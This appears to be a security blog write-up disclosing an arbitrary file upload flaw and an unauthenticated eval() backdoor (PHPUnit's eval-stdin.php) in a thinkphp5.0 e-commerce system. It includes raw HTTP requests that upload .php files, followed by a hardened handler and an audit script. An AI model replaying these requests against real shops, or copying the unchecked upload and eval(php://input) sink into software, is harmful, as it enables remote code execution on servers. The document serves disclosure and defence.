Arbitrary command execution and arbitrary file upload in an open-source e-commerce system

W.r · 282 views

The shop is built on thinkphp5.0 + MySQL and is a fully open-source shop system that enterprises and individuals can use to set up their own free online shop; it also supports an open-source WeChat shop and an open-source mini-program.

This is a program I stumbled across by chance. It is fairly niche and not widely deployed; judging from a fofa search there are roughly 500+ independent IPs running it.

Arbitrary file upload, front end and back end

    public function updateUserImg($uid, $type){
        Log::write('Starting member avatar update');
        $condition = array(
            'uid' => $uid
        );

        // Pull the stored third-party profile JSON for this user.
        $user_info = $this->user->getInfo($condition, $field = 'uid,qq_info,wx_info');
        $qq_info = $user_info['qq_info'];
        $wx_info = $user_info['wx_info'];

        // The avatar URL is taken straight out of the stored profile data.
        if($type=='qq'){
            $qq_info_array = json_decode($qq_info, true);
            $user_head_img = $qq_info_array['figureurl_qq_2'];
        }elseif($type=='wchat'){
            //Log::write('WeChat info: ' . $wx_info);
            $wx_info_array = json_decode($wx_info, true);
            $user_head_img = $wx_info_array['headimgurl'];
        }else{
            $user_head_img = '';
        }

        $local_path = '';
        if(!empty($user_head_img))
        {
            if(!file_exists('upload/user')){
                $mode = intval('0777',8);   // world-writable upload directory
                mkdir('upload/user',$mode,true);
                if(!file_exists('upload/user'))
                {
                    die('upload/user is not writable, please check read/write permissions!');
                }
            }
            // Name is just time()+rand(); the fetched content is never inspected.
            $local_path = 'upload/user/'.time().rand(111,999).'.png';
            save_weixin_img($local_path, $user_head_img);
        }
        if(!empty($local_path))
        {
            $retval = $this->user->save(['user_headimg' => $local_path,], ['uid' => $uid]);
        }else{
            $retval = 0;
        }
        return $retval;
    }


No validation at all is applied to the uploaded file name or contents, so an arbitrary file can be written into the web root. In the request below, the act_edit_img action of the member/person page accepts a .php file in the user_headimg field; the Content-Type of the part is simply set to image/jpeg and nothing checks it.

Exploitation:

POST /index.php?s=/member/person HTTP/1.1
Host: xxxx
Content-Length: 924
Cache-Control: max-age=0
Origin: http://xxxx
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySuT4zF1iypR1XEll
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://xxxx/index.php?s=/member/person
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=tnvvs3e635nf8vc8bg7k7dcmh6; page_cookie=%7B%22page_index%22%3A1%2C%22show_number%22%3A%2214%22%2C%22url%22%3A%22http%3A%2F%2F120.79.244.0%2Findex.php%3Fs%3D%2Fadmin%2Fconfig%2Fshopnavigationlist%22%7D
Connection: close

------WebKitFormBoundarySuT4zF1iypR1XEll
Content-Disposition: form-data; name="user_headimg"; filename="5e5cbbe4725bb.php"
Content-Type: image/jpeg


------WebKitFormBoundarySuT4zF1iypR1XEll
Content-Disposition: form-data; name="act"

act_edit_img
------WebKitFormBoundarySuT4zF1iypR1XEll
Content-Disposition: form-data; name="submit2"

确认修改
------WebKitFormBoundarySuT4zF1iypR1XEll--

The back-end upload handler (/wap/upload/uploadfile, reached from the admin pages) is equally unfiltered. Here the client even supplies the target directory itself via the file_path field, as well as the file name:

POST /index.php?s=/wap/upload/uploadfile HTTP/1.1
Host: xxxx
Content-Length: 73793
Cache-Control: max-age=0
Origin: http://xxxx
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryilA30KLVw3Nyddto
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://xxxx/index.php?s=/admin/auth/userdetail
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=tnvvs3e635nf8vc8bg7k7dcmh6; page_cookie=%7B%22page_index%22%3A1%2C%22show_number%22%3A%2214%22%2C%22url%22%3A%22http%3A%2F%2F120.79.244.0%2Findex.php%3Fs%3D%2Fadmin%2Fconfig%2Fshopnavigationlist%22%7D
Connection: close

------WebKitFormBoundaryilA30KLVw3Nyddto
Content-Disposition: form-data; name="file_path"

upload/avator/
------WebKitFormBoundaryilA30KLVw3Nyddto
Content-Disposition: form-data; name="file_upload"; filename="5e5cbbe4725bb.php"
Content-Type: image/jpeg

xxxx
------WebKitFormBoundaryilA30KLVw3Nyddto--
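As an added example (not code from the project), here is a hardened replacement that covers both of the upload paths above: the front-end avatar upload (act_edit_img / user_headimg, names taken from the first request) and the back-end uploadfile handler. The target directory is fixed server-side, the type is decided from the bytes rather than from the client's filename or Content-Type, and the stored name is generated by the server. UPLOAD_DIR, MAX_BYTES, ALLOWED_TYPES and storeAvatar are my own names.

```php
<?php
// Added example, not code from the project: a hardened replacement for the
// avatar/file upload handlers above. Field names ($_FILES['user_headimg'],
// act=act_edit_img) come from the PoC request; everything else is assumed.
declare(strict_types=1);

// Fixed server-side target. The client never chooses the directory
// (contrast the attacker-supplied file_path field in the second request).
const UPLOAD_DIR = __DIR__ . '/upload/user';
const MAX_BYTES  = 2 * 1024 * 1024;
// MIME type determined from content -> extension the server assigns.
const ALLOWED_TYPES = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

/**
 * Validate one $_FILES entry and store it under UPLOAD_DIR.
 * Returns the web-relative path on success, throws on any failure.
 */
function storeAvatar(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Reject anything that did not arrive through PHP's upload mechanism.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    // Type from the bytes, not from the client's Content-Type or filename=
    // (the PoC sends a .php labelled image/jpeg).
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!array_key_exists($mime, ALLOWED_TYPES)) {
        throw new RuntimeException('disallowed type: ' . $mime);
    }
    // Independent second check: the file must actually decode as an image.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || $info['mime'] !== $mime) {
        throw new RuntimeException('not a valid image');
    }
    // Server-generated name: no client-controlled string reaches the path.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
    if (!is_dir(UPLOAD_DIR) && !mkdir(UPLOAD_DIR, 0755, true)) {
        throw new RuntimeException('cannot create upload directory');
    }
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644);   // never 0777
    return 'upload/user/' . $name;
}

// Wiring for the member/person action, matching the PoC's form fields.
if (($_POST['act'] ?? '') === 'act_edit_img' && isset($_FILES['user_headimg'])) {
    try {
        $path = storeAvatar($_FILES['user_headimg']);
        // ... persist $path in the user row, e.g. via the model's save()
        echo $path;
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo $e->getMessage();
    }
}
```

Two things the handler cannot do on its own and that still need doing: the admin-side handler must additionally verify the caller is authenticated and authorised before calling storeAvatar, and the web server should be configured not to execute scripts under upload/ at all, so that a validation gap never becomes code execution.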

Arbitrary command execution backdoor

The deployment ships PHPUnit's eval-stdin.php inside vendor/, and this copy hands the raw HTTP request body straight to eval():

eval('?>' . file_get_contents('php://input'));

Any request that reaches this file with PHP code in its body is executed by the server, with no authentication involved.

Fix recommendation: remove phpunit (and other dev-only dependencies) from the deployed vendor/ directory, or change php://input to php://stdin in that file so that it reads the process's stdin instead of the HTTP body. In either case, also deny web access to vendor/ so that no other library file can be hit directly.
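Before relying on "we deleted phpunit", it is worth checking the whole deployed tree for the same sink. As an added example (not the project's code), this small PHP CLI audit walks a directory and reports .php files in which an eval() call consumes php://input; it builds a constructed sample tree in a temp directory so it runs offline, and the file names in that tree are assumptions. The php://stdin variant from the fix recommendation is deliberately not reported, since that stream is not the request body.

```php
<?php
// Added example, not from the project: CLI audit for eval(php://input) sinks.
// The sample tree below is constructed for the demonstration.
declare(strict_types=1);

/**
 * Return paths (relative to $root) of .php files containing an eval(...)
 * whose argument list mentions php://input. Files that read php://stdin,
 * or that read php://input without eval(), are not reported.
 */
function findEvalInputSinks(string $root): array
{
    $hits = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        if ($file->getExtension() !== 'php') {
            continue;
        }
        $src = file_get_contents($file->getPathname());
        // eval( ... php://input ... ) inside one statement (no ';' in between)
        if (preg_match('~\beval\s*\((?:(?!;).)*php://input~s', $src) === 1) {
            $hits[] = substr($file->getPathname(), strlen($root) + 1);
        }
    }
    sort($hits);
    return $hits;
}

// Constructed sample tree: one backdoor file, one patched copy, one benign reader.
$root = sys_get_temp_dir() . '/audit_' . bin2hex(random_bytes(4));
mkdir("$root/vendor/phpunit/phpunit/src/Util/PHP", 0755, true);
mkdir("$root/app", 0755, true);
file_put_contents("$root/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
    "<?php\neval('?>' . file_get_contents('php://input'));\n");
file_put_contents("$root/app/patched.php",
    "<?php\neval('?>' . file_get_contents('php://stdin'));\n");   // the "change to stdin" fix
file_put_contents("$root/app/reader.php",
    "<?php\n\$body = file_get_contents('php://input'); // no eval\n");

foreach (findEvalInputSinks($root) as $hit) {
    echo "eval(php://input) sink: $hit\n";
}
```

Run it as `php audit.php` (the file name is arbitrary); on the sample tree it prints only the vendor/phpunit path. Point $root at a real deployment to check that the vendor/ cleanup actually happened.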
